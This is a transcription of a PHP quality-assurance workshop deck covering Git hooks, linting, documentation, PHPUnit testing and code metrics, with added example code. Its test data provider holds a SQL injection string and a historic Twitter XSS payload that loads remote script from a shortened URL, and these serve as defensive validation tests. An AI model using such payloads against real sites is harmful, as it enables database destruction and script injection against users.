This document discusses quality assurance (QA) for PHP projects. It introduces various QA tools and techniques including syntax checking, documentation, testing, version control and code coverage. Screenshots are provided to illustrate concepts like detecting bugs early, observing behavior and preventing mistakes. The document also includes exercises for attendees to practice setting up version control with Git, running syntax checks with PHP Lint, generating documentation with phpDocumentor, and testing models with PHPUnit.
3. Michelangelo van Dam
PHP Consultant
Community Leader
President of PHPBenelux
Contributor to PHP projects
T @DragonBe | F DragonBe
https://www.flickr.com/photos/akrabat/8784318813
4. Using Social Media?
Tag it #phpqa
http://www.flickr.com/photos/andyofne/4633356197
22. Advantages of SCM
• Team development
• Multi-versions management
• Keep track of history
• Tagging milestones
• Backup of source code
• Full integration
https://www.flickr.com/photos/skoop/5397232723
23. Exercise
• Start a new project “phpqa-intro”
• Initialise it as a Git project
• Create a “hello world” php script
• Add it to the repository & commit
24. Possible answer
$ cd workspace
$ mkdir phpqa-intro
$ cd phpqa-intro
$ git init
$(master #) echo "<?php echo 'Hello World' . PHP_EOL;" > helloworld.php
$(master #) git add helloworld.php
$(master #) git commit -m 'Initial commit of helloworld'
[master (root-commit) 174c675] Initial commit of helloworld
1 file changed, 1 insertion(+)
create mode 100644 helloworld.php
$(master)
29. Exercise
• Download the pre-commit hook from http://in2.se/phplintgit (or get it from the USB drive)
• Make sure you make it executable
• Create a syntax error in error.php and commit it
• Check that you get the error and that the file is not committed
30. Possible answer
$(master) git checkout -b phplint
$(phplint) wget -O .git/hooks/pre-commit http://in2.se/phplintgit
$(phplint) chmod ugo+x .git/hooks/pre-commit
$(phplint) echo "<?php echo 'Hello error' . PHP_EOL" > error.php
$(phplint) git add error.php
$(phplint +) git commit -m 'Trying to add code with errors'
Syntax errors found in file: error.php

Found PHP parse errors:
PHP Parse error: parse error, expecting `','' or `';'' in /Users/dragonbe/workspace/phpqa-intro/error.php on line 2
Parse error: parse error, expecting `','' or `';'' in /Users/dragonbe/workspace/phpqa-intro/error.php on line 2

PHP parse errors found. Fix errors and commit again.
$(phplint +)
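A pre-commit hook is an executable that git runs on every commit, so it helps to be able to read what it does. The following is an added example, not the hook served at the URL above (whose contents are not shown on the slides): a minimal hook written in PHP that lints the staged version of each PHP file. It assumes `git` is on the PATH and that the hook is run by the PHP CLI.

```php
#!/usr/bin/env php
<?php
// Added example: save as .git/hooks/pre-commit and make it executable.
// Lints the *staged* content of each PHP file, so what is checked is
// exactly what would be committed, not the working-tree copy.

// -z separates names with NUL, so paths containing spaces stay intact.
$raw = shell_exec('git diff --cached --name-only --diff-filter=ACM -z');
$staged = array_filter(explode("\0", (string) $raw), 'strlen');

$failed = [];
foreach ($staged as $path) {
    if (strtolower(pathinfo($path, PATHINFO_EXTENSION)) !== 'php') {
        continue;
    }
    // ":path" names the blob in the index; php -l reads it from stdin.
    // escapeshellarg() keeps odd file names from being parsed by the shell.
    $cmd = sprintf(
        'git show %s | %s -l 2>&1',
        escapeshellarg(':' . $path),
        escapeshellarg(PHP_BINARY)
    );
    $output = [];               // exec() appends, so reset per file
    exec($cmd, $output, $status);
    if ($status !== 0) {
        $failed[$path] = implode(PHP_EOL, $output);
    }
}

if ($failed) {
    foreach ($failed as $path => $message) {
        fwrite(STDERR, "Syntax errors found in file: $path" . PHP_EOL);
        fwrite(STDERR, $message . PHP_EOL);
    }
    fwrite(STDERR, 'PHP parse errors found. Fix errors and commit again.' . PHP_EOL);
    exit(1);                    // non-zero exit makes git abort the commit
}
exit(0);
```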
32. Why provide docblocks?
• Useful information about the class, method or logic
• Provides hints in IDEs
• Great reference for
  • New team members
  • 3rd party developers
https://www.flickr.com/photos/mundoo/2293493420
35. Exercise
• Create a class with a couple of methods (or use the class in “exercise/MyClass.php”)
• Run phpdoc against this class
./vendor/bin/phpdoc -d exercise/phpdoc -t build/phpdoc
• See the resulting documentation files at http://192.168.166.166/phpdoc
37. Most common excuses why developers don’t test
• no time
• no budget
• deliver tests after finishing the project (never)
• devs don’t know how
https://www.flickr.com/photos/dasprid/8147986307
50. A few remarks
• Testing against databases is “integration testing”
• Testing against databases is slow
• Testing against databases is only useful for
  • triggers & stored procedures
  • correct encoding and collations
61. First modify our class
<?php
namespace Phpqa\Model;

use Zend\InputFilter\InputFilter;
use Zend\InputFilter\Input;
use Zend\Filter;
use Zend\Validator;

class Comment
{
    /**
     * @var InputFilter
     */
    protected $inputFilter;

    /**
     * @return InputFilter
     */
    public function getInputFilter()
    {
        // Lazy loading of filter and validation rules
        if (null === $this->inputFilter) {
        }
        return $this->inputFilter;
    }
}
65. badDataProvider
/**
 * Provides data that we consider to be unsafe
 * @return array
 */
public function badDataProvider()
{
    return [
        [
            [
                'commentId' => 0,
                'fullName' => '',
                'emailAddress' => '',
                'website' => '',
                'comment' => '',
            ]
        ],[
            [
                'commentId' => 'Little Bobby Tables',
                'fullName' => 'Robert\'); DROP TABLE `students`; --',
                'emailAddress' => 'clickjack@hackers',
                'website' => "http://t.co/@\"style=\"font-size:999999999999px;\"onmouseover=\"$.getScript('http:u002fu002fis.gdu002ffl9A7')\"/",
                'comment' => 'exploit twitter 9/21/2010',
            ]
        ],
    ];
}
66. our bad data test
/**
 * @dataProvider badDataProvider
 */
public function testCommentIsProtectedAgainstHacks($data)
{
    $comment = new Comment();
    $comment->getInputFilter()->setData($data);
    $this->assertFalse($comment->getInputFilter()->isValid());
}
68. Exercise
• Add some more “badData” entries
• See if the validation rules hold
• Test one of the latest exploits
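The filter and validation rules themselves are not on these slides. As an added example (not the author's code, and using PHP's built-in `filter_var` rather than Zend\InputFilter), this is one set of per-field rules that rejects rows like those in badDataProvider; the function name, the rules and the sample rows are assumptions made for illustration.

```php
<?php
// Added example: plain-PHP stand-in for the filter rules.
// Validation only narrows input; SQL still needs bound parameters and
// HTML output still needs escaping.

/** @return string[] names of the fields that failed validation */
function invalidCommentFields(array $data): array
{
    $bad = [];
    // Positive integers only.
    $id = filter_var($data['commentId'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($id === false) {
        $bad[] = 'commentId';
    }
    // Allow-list: letters, marks, space, dot, apostrophe, hyphen; 1-150 chars.
    // \A and \z anchor the whole string, so a trailing newline is not ignored.
    if (!preg_match('/\A[\p{L}\p{M} .\'-]{1,150}\z/u', (string) ($data['fullName'] ?? ''))) {
        $bad[] = 'fullName';
    }
    if (filter_var($data['emailAddress'] ?? '', FILTER_VALIDATE_EMAIL) === false) {
        $bad[] = 'emailAddress';
    }
    // Optional field. FILTER_VALIDATE_URL alone lets quotes and angle brackets
    // through, so scheme and characters are checked explicitly as well.
    $url = (string) ($data['website'] ?? '');
    if ($url !== '' && (filter_var($url, FILTER_VALIDATE_URL) === false
            || !preg_match('#\Ahttps?://#i', $url)
            || preg_match('/["\'<>\s]/', $url))) {
        $bad[] = 'website';
    }
    if (trim((string) ($data['comment'] ?? '')) === '') {
        $bad[] = 'comment';
    }
    return $bad;
}

// Constructed rows: two modelled on badDataProvider, one that should pass.
$rows = [
    'empty' => ['commentId' => 0, 'fullName' => '', 'emailAddress' => '', 'website' => '', 'comment' => ''],
    'hostile' => ['commentId' => 'Little Bobby Tables', 'fullName' => 'Robert\'); DROP TABLE `students`; --',
        'emailAddress' => 'clickjack@hackers', 'website' => 'http://t.co/@"onmouseover="alert(1)"/',
        'comment' => 'exploit twitter 9/21/2010'],
    'good' => ['commentId' => 1, 'fullName' => 'Robert Tables', 'emailAddress' => 'robert@example.com',
        'website' => 'https://example.com/', 'comment' => 'Nice talk'],
];
foreach ($rows as $label => $row) {
    $bad = invalidCommentFields($row);
    echo $label, ': ', $bad ? 'rejected: ' . implode(', ', $bad) : 'accepted', PHP_EOL;
}
```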
72. pDepend info
• CYCLO: Cyclomatic Complexity
• LOC: Lines of Code
• NOM: Number of Methods
• NOC: Number of Classes
• NOP: Number of Packages
• AHH: Average Hierarchy Height
• ANDC: Average Number of Derived Classes
• FANOUT: Number of Called Classes
• CALLS: Number of Operation Calls
73. Cyclomatic Complexity
• metric calculation
• execution paths
• independent control structures
  • if, else, for, foreach, switch case, while, do, …
• within a single method or function
• more info
  http://en.wikipedia.org/wiki/Cyclomatic_complexity
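To make the metric concrete, here is an added example (not pDepend's implementation): a simplified count that walks PHP's own token stream and adds one for every token that opens an extra execution path. The function name and the sample function are assumptions made for illustration.

```php
<?php
// Added example: a simplified CYCLO count over one function's source.

/** Counts decision points in a PHP snippet and adds one for the entry path. */
function cyclomaticComplexity(string $source): int
{
    // Tokens that open an extra execution path. A plain "else" opens none
    // (it is the other side of its "if"), and do...while is counted once
    // through its T_WHILE token.
    $decisions = [
        T_IF, T_ELSEIF, T_FOR, T_FOREACH, T_WHILE, T_CASE, T_CATCH,
        T_BOOLEAN_AND, T_BOOLEAN_OR, T_LOGICAL_AND, T_LOGICAL_OR,
    ];
    $count = 1;
    foreach (token_get_all($source) as $token) {
        // Array tokens carry an id; single characters such as the ternary
        // "?" arrive as plain strings.
        $isDecision = is_array($token)
            ? in_array($token[0], $decisions, true)
            : $token === '?';
        if ($isDecision) {
            $count++;
        }
    }
    return $count;
}

// Constructed sample function to measure.
$sample = <<<'PHP'
<?php
function classify(array $items)
{
    $result = [];
    foreach ($items as $item) {
        if ($item < 0 || $item > 100) {
            continue;
        } elseif ($item === 0) {
            $result[] = 'zero';
        } else {
            $result[] = $item % 2 ? 'odd' : 'even';
        }
    }
    return $result;
}
PHP;

echo 'CYCLO = ', cyclomaticComplexity($sample), PHP_EOL;
```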
74. Average Hierarchy Height
• The average of the maximum length from a root class to its deepest subclass
89. What?
• validates coding standards
• consistency
• readability
• set as a policy for development
• reports failures to meet the standard
• sometimes good: parentheses on wrong line
• mostly bad: line exceeds 80 characters
• but needed for terminal viewing of code
• can be set as pre-commit hook
• but can cause frustration!!!
91. Exercise
• Run the following commands against “MyClass”
• pdepend
• phpmd
• phpcpd
• phpcs (php_CodeSniffer)
• What is the result?